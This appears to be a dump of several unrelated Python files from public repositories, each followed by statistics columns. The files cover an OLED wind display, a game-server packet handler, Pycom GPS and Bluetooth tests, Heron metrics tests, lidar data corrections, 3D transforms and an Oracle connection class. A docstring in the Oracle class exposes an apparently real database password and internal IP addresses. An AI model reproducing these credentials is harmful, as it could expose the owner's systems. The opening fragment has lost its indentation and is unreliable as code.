loop_string(long_string, lcd, framebuffer, 1, 16, lcdpause)
#Display information via OLED
if oledused and metar_taf_mos != 3 and toggle_sw != -1:
logger.debug("Display on a OLED display") #debug
if temp == len(sortwindslist)-1: #Check to see if display should be inverted after each group of airports
if toginv:
toggle = not(toggle)
temp = 0
else:
temp += 1
if invert: #If invert is set to 1 then display black text on white background
toggle = 1
for ch in range(startnum, stopnum, stepnum): #numofdisplays-1, -1, -1):
ap,wnd = sortwindslist[ch] #Grab airport and its winds to display
dir = wnddirdict.get(ap) #get wind direction by airport
gust = wndgustdict.get(ap) #get wind gust by airport - Mez
if dir is None:
dir = 361
logger.debug(str(ch) + ' ' + str(ap) + ' ' + str(dir) + ' ' + str(wnd) + ' ' + str(gust)) #debug
val = ap + "\n" + str(wnd) #Provide a starting value that will get modified by oledcenter function
if ap == hiap and boldhiap: #Highlight the airport with the highest winds in bold text.
font = boldfont
else:
font = regfont
oledcenter(val, ch, font, dir, dimming, toggle, 0) #send airport and winds to proper oled display
#shift list 1 position then redisplay. Creates scrolling effect.
if scrolldis: #Determine if display should scroll right=1 or left=0
sortwindslist = (sortwindslist[-1:] + sortwindslist[:-1]) #From; https://www.geeksforgeeks.org/python-program-right-rotate-list-n/
else:
sortwindslist = (sortwindslist[1:] + sortwindslist[:1])
time.sleep(oledpause) #pause between scroll effect
if k == len(sortwindslist)-1 and displaytime: #Display current and zulu time if displaytime = 1
now = datetime.now()
zulu = datetime.utcnow()
localtime = now.strftime("%I:%M %p\n Local") #12:00 PM format
zulutime = zulu.strftime("%H:%M\n Zulu") #24-hour Zulu format
pos = int((numofdisplays-3)/2) #Calculate position to display the time. Needs 3 screens minimum.
logger.debug(localtime) #debug
logger.debug(zulutime) #debug
arrowdir = '' #No Arrow needed
clearoleddisplays() #clear displays
if numofdisplays % 2 == 0: #Check if we have an odd or even num of displays
pass
else:
oledcenter('Current\nTime', pos, font, arrowdir, dimming, toggle) #send Current Time to proper oled display
if numofdisplays < 2: #Check to see if there is only 1 oled and pause between screens if there is.
time.sleep(oledpause)
oledcenter(localtime, pos+1, font, arrowdir, dimming, toggle) #send Local Time to proper oled display
if numofdisplays < 2: #Check to see if there is only 1 oled and pause between screens if there is.
time.sleep(oledpause)
oledcenter(zulutime, pos+2, font, arrowdir, dimming, toggle) #send Zulu Time to proper oled display
k = 0
if numofdisplays < 2:
time.sleep(oledpause)
else:
time.sleep(oledpause*2) #long pause
else:
k = k + 1
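
# Centering example (added for illustration, not in the original source): with
# numofdisplays = 9 the time block starts at pos = int((9 - 3) / 2) = 3, so the
# Current/Local/Zulu screens land on displays 3, 4 and 5, the middle of the chain.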
| 52.55492 | 216 | 0.568535 | 11,577 | 91,866 | 4.442429 | 0.119547 | 0.014875 | 0.0091 | 0.011627 | 0.356679 | 0.310364 | 0.287886 | 0.273245 | 0.251799 | 0.219094 | 0 | 0.034168 | 0.347223 | 91,866 | 1,747 | 217 | 52.585003 | 0.823456 | 0.374654 | 0 | 0.361983 | 0 | 0.001653 | 0.083552 | 0.004906 | 0 | 0 | 0.000635 | 0 | 0 | 1 | 0.009917 | false | 0.006612 | 0.023141 | 0 | 0.043802 | 0.003306 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ef3b38bf0a4fe8c9b6a5cce63d0f9ae7988497 | 1,311 | py | Python | src/medius/mediuspackets/setlobbyworldfilter.py | Metroynome/robo | 78c389decce98d0d1e4e4e02ccbfcba7b465209c | [
"MIT"
] | 8 | 2021-07-14T16:55:04.000Z | 2022-03-07T22:03:03.000Z | src/medius/mediuspackets/setlobbyworldfilter.py | Metroynome/robo | 78c389decce98d0d1e4e4e02ccbfcba7b465209c | [
"MIT"
] | 22 | 2021-07-13T02:17:00.000Z | 2022-02-13T03:26:52.000Z | src/medius/mediuspackets/setlobbyworldfilter.py | Metroynome/robo | 78c389decce98d0d1e4e4e02ccbfcba7b465209c | [
"MIT"
] | 5 | 2021-07-30T05:49:09.000Z | 2022-02-14T18:02:07.000Z |
from enums.enums import MediusEnum, CallbackStatus
from utils import utils
from medius.mediuspackets.setlobbyworldfilterresponse import SetLobbyWorldFilterResponseSerializer


class SetLobbyWorldFilterSerializer:
    data_dict = [
        {'name': 'mediusid', 'n_bytes': 2, 'cast': None},
        {'name': 'message_id', 'n_bytes': MediusEnum.MESSAGEID_MAXLEN, 'cast': None},
        {'name': 'buf', 'n_bytes': 3, 'cast': None},
        {'name': 'filter1', 'n_bytes': 4, 'cast': None},
        {'name': 'filter2', 'n_bytes': 4, 'cast': None},
        {'name': 'filter3', 'n_bytes': 4, 'cast': None},
        {'name': 'filter4', 'n_bytes': 4, 'cast': None},
        {'name': 'lobby_filter_type', 'n_bytes': 4, 'cast': None},
        {'name': 'lobby_filter_mask_level_type', 'n_bytes': 4, 'cast': None}
    ]
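
    # Layout note (added for illustration, not part of the original file): apart
    # from the MESSAGEID_MAXLEN-byte message id, the fixed-size fields above
    # account for 2 + 3 + 6 * 4 = 29 bytes of each serialized packet.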


class SetLobbyWorldFilterHandler:
    def process(self, serialized, monolith, con):
        return [SetLobbyWorldFilterResponseSerializer.build(
            serialized['message_id'],
            CallbackStatus.SUCCESS,
            serialized['filter1'],
            serialized['filter2'],
            serialized['filter3'],
            serialized['filter4'],
            serialized['lobby_filter_type'],
            serialized['lobby_filter_mask_level_type']
        )]
| 45.206897 | 98 | 0.600305 | 126 | 1,311 | 6.047619 | 0.373016 | 0.070866 | 0.125984 | 0.086614 | 0.227034 | 0.183727 | 0.07874 | 0.07874 | 0 | 0 | 0 | 0.016211 | 0.24714 | 1,311 | 29 | 99 | 45.206897 | 0.755826 | 0 | 0 | 0 | 0 | 0 | 0.237805 | 0.042683 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.111111 | 0.037037 | 0.296296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7efe6c05de80d338bfca806fa7145910c3df316 | 5,969 | py | Python | tests.py | allenc4/Vehicle-GPS-Tracking | 9adf6e8987f52f0a3808f8ac0717390a27b4475c | [
"MIT"
] | null | null | null | tests.py | allenc4/Vehicle-GPS-Tracking | 9adf6e8987f52f0a3808f8ac0717390a27b4475c | [
"MIT"
] | null | null | null | tests.py | allenc4/Vehicle-GPS-Tracking | 9adf6e8987f52f0a3808f8ac0717390a27b4475c | [
"MIT"
] | null | null | null |
from lib.pytrack import Pytrack
import machine
import time
import utime
import gc
import pycom
from network import Bluetooth, WLAN
import binascii
from config import ConfigBluetooth, ConfigMqtt, ConfigAccelerometer
from lib.mqtt import MQTTClient
from lib.LIS2HH12 import LIS2HH12

py = Pytrack()
accel = LIS2HH12()


def _decodeBytes(data):
    '''
    Attempts to decode a byte array to string format. If not a byte type,
    just returns the original data.
    '''
    try:
        return data.decode()
    except (UnicodeDecodeError, AttributeError):
        pass
    return data
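
# For example (illustrative, not in the original file):
#   _decodeBytes(b'hello') -> 'hello'
#   _decodeBytes('hello')  -> 'hello'   (str has no .decode, AttributeError is swallowed)
#   _decodeBytes(42)       -> 42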

def testGPSLib1():
    from lib.L76GNSS import L76GNSS
    print("Testing GPS using pytrack L76GNSS library")
    L76 = L76GNSS(pytrack=py)
    while True:
        coord = L76.coordinates()
        print("Coordinates: {}, mem: {}".format(coord, gc.mem_free()))


def testGPSLib2():
    from lib.L76GNSV4 import L76GNSS
    print("Testing GPS using L76GNSV4 library")
    py = Pytrack()
    L76 = L76GNSS(pytrack=py)
    L76.setAlwaysOn()

    print("gsv - info about satellites in view at this moment: ")
    # returns the info about satellites in view at this moment
    # even without the gps being fixed
    print(L76.gps_message('GSV', debug=True))
    input("Press enter to continue")

    print("gga - number of satellites in view at this moment: ")
    # returns the number of satellites in view at this moment
    # even without the gps being fixed
    print(L76.gps_message('GGA', debug=True)['NumberOfSV'])
    input("Press enter to continue")

    print("Attempting to get gps fix... This may take some time...")
    L76.get_fix(debug=False)
    pycom.heartbeat(0)
    if L76.fixed():
        pycom.rgbled(0x000f00)
    else:
        pycom.rgbled(0x0f0000)

    print("coordinates")
    # returns the coordinates
    # with debug true you see the messages parsed by the
    # library until the gps is fixed
    print(L76.coordinates(debug=False))
    print(L76.getUTCDateTime(debug=False))

    # example using the deepsleep mode of the pytrack
    print("Going to deep sleep for 60 seconds (powering down gps)")
    machine.idle()
    py.setup_sleep(60)  # sleep 1 minute
    py.go_to_sleep(gps=True)


def scanBluetooth():
    bt = Bluetooth()
    bt.start_scan(-1)  # Start scanning indefinitely until stop_scan() is called
    while True:
        adv = bt.get_adv()
        if adv:
            # try to get the complete name
            print("BT Name: {}".format(bt.resolve_adv_data(adv.data, Bluetooth.ADV_NAME_CMPL)))
            # print out mac address of bluetooth device
            print("Mac addr: {}, {}".format(adv.mac, binascii.hexlify(adv.mac)))
        else:
            time.sleep(0.5)
        time.sleep(3)


def isBTDeviceNearby():
    bt = Bluetooth()
    while True:
        print("Scanning for owner BT device nearby...")
        bt.start_scan(10)  # Scans for 10 seconds
        while bt.isscanning():
            adv = bt.get_adv()
            if adv and binascii.hexlify(adv.mac) == ConfigBluetooth.MAC_ADDR:
                try:
                    print("Owner device found: {} Mac addr {}".format(bt.resolve_adv_data(adv.data, Bluetooth.ADV_NAME_CMPL), ConfigBluetooth.MAC_ADDR))
                    conn = bt.connect(adv.mac)
                    time.sleep(0.05)
                    conn.disconnect()
                    bt.stop_scan()
                except Exception as e:
                    print("Exception {}".format(e))
                    bt.stop_scan()
                break
            else:
                time.sleep(0.050)


def testRTC():
    time.sleep(2)
    rtc = machine.RTC()
    print('Current RTC: {}, is synced: {}'.format(rtc.now(), rtc.synced()))
    rtc.ntp_sync("pool.ntp.org")
    utime.sleep_ms(750)
    print('Synced time: {}'.format(rtc.now()))
    # print('Going to sleep')
    # time.sleep(1)
    # machine.idle()
    # py.setup_sleep(10)  # sleep 10 seconds
    # py.go_to_sleep()


def testMQTT():
    mqttClient = None
    mqttClient = MQTTClient(ConfigMqtt.CLIENT_ID, ConfigMqtt.SERVER, port=ConfigMqtt.PORT, user=ConfigMqtt.USER, password=ConfigMqtt.PASSWORD)
    # Set the callback method that will be invoked on subscription to topics
    mqttClient.set_callback(mqttCallback)
    mqttClient.connect()

    # Subscribe to the disable tracking topic
    mqttClient.subscribe(topic=ConfigMqtt.TOPIC_TRACKING_STATE)
    time.sleep(0.5)
    print("Checking MQTT messages")
    mqttClient.check_msg()
    print("Messages checked. Going to sleep")
    time.sleep(15)


def mqttCallback(topic, msg):
    '''
    Method to handle callbacks of any mqtt topics that we subscribe to.
    For now, only subscribes to the bypass topic which is used to disable gps monitoring and accelerometer wakeup detection.

    topic - MQTT topic that we are subscribing to and processing the request for
    msg - Message received from the topic
    '''
    print("In MQTT subscription callback")
    # Attempt to decode the topic and msg if in byte format
    topic = _decodeBytes(topic)
    msg = _decodeBytes(msg)
    print("{}: {}".format(topic, msg))


def testCurrentDraw():
    pycom.heartbeat(False)
    for i in range(10):
        pycom.rgbled(0x00FF00)  # green
        time.sleep(1)
        pycom.rgbled(0x000000)
        time.sleep(1)
    # Test deepsleep for 10 seconds with accelerometer wakeup
    py.setup_int_wake_up(True, True)
    accel.enable_activity_interrupt(
        ConfigAccelerometer.INTERRUPT_THRESHOLD, ConfigAccelerometer.INTERRUPT_DURATION)
    py.setup_sleep(10)
    py.go_to_sleep()


# Ensure we are connected to the network.
# Check if the network is connected. If not, attempt to connect.
counter = 0
wlan = WLAN()
while not wlan.isconnected():
    # If we surpass some counter timeout and network is still not connected, reset and attempt to connect again
    if counter > 100000:
        machine.reset()
    machine.idle()
    counter += 1

# isBTDeviceNearby()
testCurrentDraw()
| 30.454082 | 152 | 0.653208 | 770 | 5,969 | 5.002597 | 0.322078 | 0.023364 | 0.016615 | 0.018692 | 0.155763 | 0.132918 | 0.0919 | 0.0919 | 0.063344 | 0.063344 | 0 | 0.027474 | 0.249958 | 5,969 | 196 | 153 | 30.454082 | 0.832924 | 0.244262 | 0 | 0.206349 | 0 | 0 | 0.144434 | 0 | 0 | 0 | 0.00721 | 0 | 0 | 1 | 0.071429 | false | 0.015873 | 0.103175 | 0 | 0.190476 | 0.18254 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f0aa97f2f4c457f1d684b06ee02119ec9dcf44 | 5,480 | py | Python | heron/instance/tests/python/utils/metrics_helper_unittest.py | takeratta/heron | 7b7c38594186f009741c62d379364b9b45d82b61 | [
"Apache-2.0"
] | 1 | 2021-06-29T07:00:10.000Z | 2021-06-29T07:00:10.000Z | heron/instance/tests/python/utils/metrics_helper_unittest.py | kalimfaria/heron | d59bd016b826006e2af22c7a6452342f5e7d637c | [
"Apache-2.0"
] | null | null | null | heron/instance/tests/python/utils/metrics_helper_unittest.py | kalimfaria/heron | d59bd016b826006e2af22c7a6452342f5e7d637c | [
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-

# Copyright 2016 Twitter. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# pylint: disable=missing-docstring
import unittest

from heronpy.api.metrics import (CountMetric, MultiCountMetric,
                                 MeanReducedMetric, MultiMeanReducedMetric)

from heron.instance.src.python.utils.metrics import BaseMetricsHelper
from heron.proto import metrics_pb2

import heron.instance.tests.python.utils.mock_generator as mock_generator


class BaseMetricsHelperTest(unittest.TestCase):
    def setUp(self):
        self.metrics = {"metric1": CountMetric(),
                        "metric2": MultiCountMetric(),
                        "metric3": MeanReducedMetric(),
                        "metric4": MultiMeanReducedMetric()}
        self.metrics_helper = BaseMetricsHelper(self.metrics)
        self.metrics_collector = mock_generator.MockMetricsCollector()

    def tearDown(self):
        self.metrics = None
        self.metrics_helper = None
        self.metrics_collector = None

    def test_register_metrics(self):
        self.metrics_helper.register_metrics(self.metrics_collector, 60)
        for name, metric in self.metrics.items():
            self.assertEqual(self.metrics_collector.metrics_map[name], metric)
        self.assertEqual(len(self.metrics_collector.time_bucket_in_sec_to_metrics_name[60]), 4)
        self.assertIn(60, self.metrics_collector.registered_timers)

    def test_update_count(self):
        self.metrics_helper.update_count("metric1")
        self.assertEqual(self.metrics["metric1"].get_value_and_reset(), 1)
        self.assertEqual(self.metrics["metric1"].get_value_and_reset(), 0)
        self.metrics_helper.update_count("metric1", incr_by=10)
        self.assertEqual(self.metrics["metric1"].get_value_and_reset(), 10)

        self.metrics_helper.update_count("metric2", key="key1")
        self.assertEqual(self.metrics["metric2"].get_value_and_reset(), {"key1": 1})
        self.assertEqual(self.metrics["metric2"].get_value_and_reset(), {"key1": 0})
        self.metrics_helper.update_count("metric2", incr_by=10, key="key2")
        self.assertEqual(self.metrics["metric2"].get_value_and_reset(), {"key1": 0,
                                                                         "key2": 10})

    def test_update_reduced_metric(self):
        for i in range(1, 11):
            self.metrics_helper.update_reduced_metric("metric3", i)
        self.assertEqual(self.metrics["metric3"].get_value_and_reset(), 5.5)
        self.assertIsNone(self.metrics["metric3"].get_value_and_reset())

        for i in range(1, 11):
            self.metrics_helper.update_reduced_metric("metric4", i, key="key1")
            self.metrics_helper.update_reduced_metric("metric4", i * 2, key="key2")
            self.metrics_helper.update_reduced_metric("metric4", i * 3, key="key3")
        self.assertEqual(self.metrics["metric4"].get_value_and_reset(), {"key1": 5.5,
                                                                         "key2": 11,
                                                                         "key3": 16.5})
        self.assertEqual(self.metrics["metric4"].get_value_and_reset(), {"key1": None,
                                                                         "key2": None,
                                                                         "key3": None})


class MetricsCollectorTest(unittest.TestCase):
    def setUp(self):
        self.metrics_collector = mock_generator.MockMetricsCollector()

    def tearDown(self):
        self.metrics_collector = None

    def test_register_metric(self):
        name1 = "metric1"
        metric1 = CountMetric()
        self.metrics_collector.register_metric(name1, metric1, 60)
        self.assertEqual(self.metrics_collector.metrics_map[name1], metric1)
        self.assertIn(60, self.metrics_collector.registered_timers)

        name2 = "metric2"
        metric2 = MeanReducedMetric()
        self.metrics_collector.register_metric(name2, metric2, 60)
        self.assertEqual(self.metrics_collector.metrics_map[name2], metric2)
        self.assertEqual(self.metrics_collector.time_bucket_in_sec_to_metrics_name[60],
                         [name1, name2])

        name3 = "metric3"
        metric3 = MultiMeanReducedMetric()
        self.metrics_collector.register_metric(name3, metric3, 30)
        self.assertEqual(self.metrics_collector.metrics_map[name3], metric3)
        self.assertEqual(self.metrics_collector.registered_timers, [60, 30])

    # pylint: disable=protected-access
    def test_gather_metrics(self):
        name = "metric"
        metric = CountMetric()
        metric.incr(to_add=10)
        self.metrics_collector.register_metric(name, metric, 60)
        self.assertIn(60, self.metrics_collector.time_bucket_in_sec_to_metrics_name)

        self.metrics_collector._gather_metrics(60)
        message = self.metrics_collector.out_metrics.poll()
        self.assertIsNotNone(message)
        self.assertIsInstance(message, metrics_pb2.MetricPublisherPublishMessage)
        self.assertEqual(message.metrics[0].name, name)
        self.assertEqual(message.metrics[0].value, str(10))
        self.assertEqual(metric.get_value_and_reset(), 0)
| 44.918033 | 91 | 0.691058 | 654 | 5,480 | 5.591743 | 0.249235 | 0.138365 | 0.114848 | 0.106645 | 0.502598 | 0.425759 | 0.383374 | 0.303527 | 0.224228 | 0.184031 | 0 | 0.030745 | 0.198723 | 5,480 | 121 | 92 | 45.289256 | 0.802095 | 0.12354 | 0 | 0.139535 | 0 | 0 | 0.050355 | 0 | 0 | 0 | 0 | 0 | 0.290698 | 1 | 0.104651 | false | 0 | 0.05814 | 0 | 0.186047 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f1d9a93cc3b07e5f1b317fe6365a6639b2f656 | 3,309 | py | Python | act/corrections/mpl.py | michaeltg12/ACT | c801ac7ac2762bdc73e1d419bc7c266512d55903 | [
"BSD-3-Clause"
] | null | null | null | act/corrections/mpl.py | michaeltg12/ACT | c801ac7ac2762bdc73e1d419bc7c266512d55903 | [
"BSD-3-Clause"
] | null | null | null | act/corrections/mpl.py | michaeltg12/ACT | c801ac7ac2762bdc73e1d419bc7c266512d55903 | [
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import xarray as xr
import warnings


def correct_mpl(obj):
    """
    This procedure corrects MPL data:
    1.) Throw out data before laser firing (heights < 0).
    2.) Remove background signal.
    3.) Afterpulse Correction - Subtraction of (afterpulse - darkcount).
        NOTE: Currently the Darkcount in VAPS is being calculated as
        the afterpulse at ~30km. But that might not be absolutely
        correct and we will likely start providing darkcount profiles
        ourselves along with other corrections.
    4.) Range Correction.
    5.) Overlap Correction (Multiply).

    Note: Deadtime and darkcount corrections are not being applied yet.

    Parameters
    ----------
    obj : Dataset object
        The ACT object.

    Returns
    -------
    obj : Dataset object
        The ACT object containing the corrected values.

    """
    # Get some variables before processing begins
    act = obj.act

    # Overlap Correction Variable
    op = obj['overlap_correction'].values[0, :]
    op_height = obj['overlap_correction_heights'].values[0, :]

    # 1 - Remove negative height data
    obj = obj.where(obj.height > 0, drop=True)
    height = obj['height'].values

    # The drop strips out the ACT data so re-populating
    obj.act = act

    # Get indices for calculating background
    var_names = ['signal_return_co_pol', 'signal_return_cross_pol']
    ind = [obj.height.shape[1] - 50, obj.height.shape[1] - 2]

    # Subset last gates into new dataset
    dummy = obj.isel(range_bins=xr.DataArray(np.arange(ind[0], ind[1])))

    # Turn off warnings
    warnings.filterwarnings("ignore")

    # Run through co and cross pol data for corrections
    co_bg = dummy[var_names[0]]
    co_bg = co_bg.where(co_bg > -9998.)
    co_bg = co_bg.mean(dim='dim_0').values

    x_bg = dummy[var_names[1]]
    x_bg = x_bg.where(x_bg > -9998.)
    x_bg = x_bg.mean(dim='dim_0').values

    # Seems to be the fastest way of removing background signal at the moment
    co_data = obj[var_names[0]].where(obj[var_names[0]] > 0).values
    x_data = obj[var_names[1]].where(obj[var_names[1]] > 0).values
    for i in range(len(obj['time'].values)):
        co_data[i, :] = co_data[i, :] - co_bg[i]
        x_data[i, :] = x_data[i, :] - x_bg[i]

    # After Pulse Correction Variable
    co_ap = obj['afterpulse_correction_co_pol'].values
    x_ap = obj['afterpulse_correction_cross_pol'].values
    for j in range(len(obj['range_bins'].values)):
        # Afterpulse Correction
        co_data[:, j] = co_data[:, j] - co_ap[:, j]
        x_data[:, j] = x_data[:, j] - x_ap[:, j]

        # R-Squared Correction
        co_data[:, j] = co_data[:, j] * height[:, j] ** 2.
        x_data[:, j] = x_data[:, j] * height[:, j] ** 2.

        # Overlap Correction
        idx = (np.abs(op_height - height[0, j])).argmin()
        co_data[:, j] = co_data[:, j] * op[idx]
        x_data[:, j] = x_data[:, j] * op[idx]

    # Create the co/cross ratio variable
    ratio = (x_data / co_data) * 100.
    obj['cross_co_ratio'] = obj[var_names[0]].copy(data=ratio)

    # Convert data to decibels
    co_data = 10. * np.log10(co_data)
    x_data = 10. * np.log10(x_data)

    # Write data to object
    obj[var_names[0]].values = co_data
    obj[var_names[1]].values = x_data

    return obj
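
# Worked example (added for illustration, not in the original module): after the
# r-squared step a background-subtracted count in gate j is scaled by height**2,
# and the final decibel conversion maps, e.g., a corrected co-pol value of 100
# to 10 * log10(100) = 20 dB.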
| 32.126214 | 77 | 0.631611 | 493 | 3,309 | 4.081136 | 0.312373 | 0.038767 | 0.03827 | 0.023857 | 0.13668 | 0.095427 | 0.023857 | 0 | 0 | 0 | 0 | 0.021446 | 0.239045 | 3,309 | 102 | 78 | 32.441176 | 0.777601 | 0.376247 | 0 | 0 | 0 | 0 | 0.1 | 0.055102 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02381 | false | 0 | 0.071429 | 0 | 0.119048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f2acb039da4ed12afd34efa24f6869f05b942e | 2,547 | py | Python | hilbert3D/Transformation.py | AThom0x7cc/HilbertCurve3D | 67f0067626a72bf30fa3d7b7956e2dd6ca1880fd | [
"Unlicense"
] | null | null | null | hilbert3D/Transformation.py | AThom0x7cc/HilbertCurve3D | 67f0067626a72bf30fa3d7b7956e2dd6ca1880fd | [
"Unlicense"
] | null | null | null | hilbert3D/Transformation.py | AThom0x7cc/HilbertCurve3D | 67f0067626a72bf30fa3d7b7956e2dd6ca1880fd | [
"Unlicense"
] | null | null | null |
from .Math import Point, Vector, sin, cos


class Transformation:
    def __init__(self, points_generator, spectator, x, y, z, x_angle, y_angle):
        self.points_generator = points_generator
        self.spectator = spectator
        self.start_point = Point(x, y, z)
        self.x_angle = x_angle
        self.y_angle = y_angle
        vector = self.points_generator.center_vector
        self.transformed_points_generator = self.generate_transformed_points(self.points_generator,
                                                                             self.spectator,
                                                                             vector,
                                                                             self.start_point,
                                                                             self.x_angle,
                                                                             self.y_angle)

    def generate_transformed_points(self, points_generator, spectator, vector, start_point, x_angle, y_angle):
        for new_point in points_generator:
            new_point += vector
            new_point = self.rotate_around_y_axis(y_angle, new_point)
            new_point = self.rotate_around_x_axis(-x_angle, new_point)
            new_point += Vector(start_point)
            new_point = self.perspective_view(new_point, spectator)
            yield new_point

    def __iter__(self):
        return self.transformed_points_generator

    def __next__(self):
        return next(self.transformed_points_generator)

    @classmethod
    def rotate_around_x_axis(cls, x, point):
        point_x, point_y, point_z = point
        new_point = Point(point_x * 1 + point_y * 0 + point_z * 0,
                          point_x * 0 + point_y * cos(x) - point_z * sin(x),
                          point_x * 0 + point_y * sin(x) + point_z * cos(x))
        return new_point
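
    # Illustrative check (not in the original file): rotating the point (0, 1, 0)
    # by x = pi/2 around the x axis yields approximately (0, 0, 1), since the new
    # y is cos(pi/2) = 0 and the new z is sin(pi/2) = 1.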
    @classmethod
    def rotate_around_y_axis(cls, x, point):
        point_x, point_y, point_z = point
        new_point = Point(point_x * cos(x) + point_y * 0 + point_z * sin(x),
                          point_x * 0 + point_y * 1 + point_z * 0,
                          -point_x * sin(x) + point_y * 0 + point_z * cos(x))
        return new_point

    @classmethod
    def perspective_view(cls, point, d):
        point_x, point_y, point_z = point
        temp = d / (point_z + d)
        new_point = Point(point_x * temp, point_y * temp, 0)
        return new_point


if __name__ == '__main__':
    pass
| 31.444444 | 110 | 0.52925 | 297 | 2,547 | 4.154882 | 0.151515 | 0.103728 | 0.053485 | 0.072934 | 0.431118 | 0.290924 | 0.206645 | 0.188006 | 0.188006 | 0.089141 | 0 | 0.007152 | 0.396152 | 2,547 | 80 | 111 | 31.8375 | 0.795189 | 0 | 0 | 0.183673 | 0 | 0 | 0.003141 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.020408 | 0.020408 | 0.040816 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f2d9623e91d70a0002216c25bb09cde3a87620 | 634 | py | Python | instaweight/dashboard/graph_utils.py | ma02954AteebAhmed/InstaWeight | a1ef58d60cfecb867d78b87adc6df8929216dd10 | [
"Apache-2.0"
] | null | null | null | instaweight/dashboard/graph_utils.py | ma02954AteebAhmed/InstaWeight | a1ef58d60cfecb867d78b87adc6df8929216dd10 | [
"Apache-2.0"
] | 14 | 2020-07-02T09:38:46.000Z | 2022-03-12T00:39:05.000Z | instaweight/dashboard/graph_utils.py | ma02954AteebAhmed/InstaWeight | a1ef58d60cfecb867d78b87adc6df8929216dd10 | [
"Apache-2.0"
] | 1 | 2020-07-02T06:15:50.000Z | 2020-07-02T06:15:50.000Z |
from dashboard.models import *
from datetime import datetime


def weight_distribution():
    distribution = {
        'over_weight': 0,
        'under_weight': 0,
        'normal': 0
    }
    cattle_objs = Cattle.objects.all()
    for cattle in cattle_objs:
        # NOTE: fetches the most recent DailyWeight overall (not per cattle);
        # the bucketing of weights into `distribution` is not implemented yet.
        weight = DailyWeight.objects.all().order_by('date_time').last()
        birth_date = cattle.birth_date
        today = datetime.now().date()
        age_months = (today.year - birth_date.year) * 12
        age_range = AgeRange.objects.filter(start_range__gte=age_months, end_range__lte=age_months + 6)
        print(age_months, age_range)
    return distribution
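
# Worked example (added for illustration, not in the original file): a cattle
# born on 2018-05-31 and queried on 2020-06-01 gets
# age_months = (2020 - 2018) * 12 = 24; the month component is ignored, so the
# figure is only year-granular.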
| 21.133333 | 100 | 0.659306 | 79 | 634 | 5.012658 | 0.518987 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012397 | 0.236593 | 634 | 29 | 101 | 21.862069 | 0.805785 | 0 | 0 | 0 | 0 | 0 | 0.060413 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.117647 | 0 | 0.235294 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f45c55026658b0532488333c31cecec15af687 | 6,929 | py | Python | appbak/create_execute.py | Linyameng/alphadata-dev | 7a48c9ddf24442a89f3f8ab1ba78e573c8844f26 | [
"Apache-2.0"
] | null | null | null | appbak/create_execute.py | Linyameng/alphadata-dev | 7a48c9ddf24442a89f3f8ab1ba78e573c8844f26 | [
"Apache-2.0"
] | null | null | null | appbak/create_execute.py | Linyameng/alphadata-dev | 7a48c9ddf24442a89f3f8ab1ba78e573c8844f26 | [
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on 2018/5/31

@author: xing yan
"""
from sqlalchemy import create_engine, Table
from sqlalchemy import MetaData
from sqlalchemy.sql import text
from sqlalchemy.exc import NoSuchTableError
from collections import OrderedDict


class OracleEngine:
    """create oracle engine.
    oracle_tms_dict = {'drivername': 'oracle+cx_oracle', 'host': '192.168.220.119',
                       'database': 'hbqa', 'password': 'howbuy2016', 'port': 1521}
    oracle_tp_dict = {'drivername': 'oracle+cx_oracle', 'host': '192.168.220.126',
